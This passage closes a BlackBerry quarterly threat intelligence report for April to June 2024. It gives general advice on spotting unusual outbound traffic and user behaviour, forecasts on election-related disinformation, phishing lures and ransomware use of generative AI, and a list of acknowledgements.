If there is a large data transfer or a sudden increase in outbound traffic, analysts should investigate, especially if the transfer occurs outside core business hours.
Anomalous Traffic
Be wary of an unexpected pattern of data transfers from unknown IPs or hosts.
User Behavior Analytics
Watch for patterns that deviate from the norm, such as a user accessing files that they would usually have no need to access. An example would be a marketing team member’s host accessing customer financial records.
Conclusion and Forecasts
This 90-day report, covering April through June 2024, is designed to help you stay informed and prepared for future threats. High-profile crime groups, especially ransomware operators, are exploiting new vulnerabilities and finding value in targets large and small. As the report noted, BlackBerry researchers observed an average of over 11,500 unique malware hashes caught daily. This level of activity makes it crucial to stay current with the latest security news for your industry and region.
Given the current state of cyberthreats, we forecast the following threats in the coming months:
Election Interference
Globally, 2024 is a significant year for elections, as about 60% of the world’s population is expected to vote. Misinformation, disinformation, and interference attempts have already been observed throughout the year, including threats via the relatively new medium of deepfakes. Malicious actors are increasingly trying to seize the moment to sow confusion, foment social divisions and cause disruption. We predict they will intensify their campaigns to spread fake news and misinformation, escalating their efforts as each election approaches.
Politically Charged Phishing Lures
The abuse of politically charged posts, forums and mailing lists to spread malware could soon become a weaponized tactic. By leveraging polarizing opinions from various political circles, threat actors might exploit this chaos to distribute political materials infected with trojans, deploying even more malware. Common tactics include creating social media posts that sow disinformation and generate millions of clicks, views and engagements across social media platforms, instant messengers and traditional news media. Many threat actors may use these social media activities as lures to conduct malware attacks.
The Weaponization of Chaos
In the realm of cybersecurity, any type of chaos serves as a fertile ground for malicious actors to exploit confusion and misinformation. Whether during wars, natural disasters, IT outages, or any significant disruption to the normal flow of communications and data, periods of instability provide ample opportunities for cybercriminals. Threat actors are poised to continually leverage such situations by disseminating fake phishing emails, misleading forum posts, and malicious software posing as helpful and contextually relevant tools.
Ransomware Evolution and AI
Facing increased scrutiny from law enforcement, lawmakers, and security professionals worldwide, ransomware threat actors are likely to evolve their tactics, techniques and procedures (TTPs) to continue their operations.
This evolution may involve leveraging AI (particularly generative AI) to develop more sophisticated and armored payloads and execution chains, utilizing deepfake technology for advanced and targeted social engineering attacks, decentralizing and anonymizing network and C2 infrastructure to evade tracking and shutdown, and improving operational security.
Visit the BlackBerry blog to stay current with the fluid landscape of cybersecurity threats and defenses.
Acknowledgements
This report represents the collaborative efforts of our talented teams and individuals. In particular, we would like to recognize:
- Adrian Chambers
- Alan McCarthy
- Alexandra Mozil
- Amalkanth Raveendran
- Anne-Carmen Ditter
- Daniel Corry
- Dean Given
- Geoff O’Rourke
- John de Boer
- Ismael Valenzuela Espejo
- Maristela Ames
- Natalia Ciapponi
- Natasha Rohner
- Ronald Welch
- Samual Rios
- Travis Hoxmeier
- William Johnson
We would also like to thank the Royal Canadian Mounted Police’s National Cybercrime Coordination Centre for their contribution and collaboration.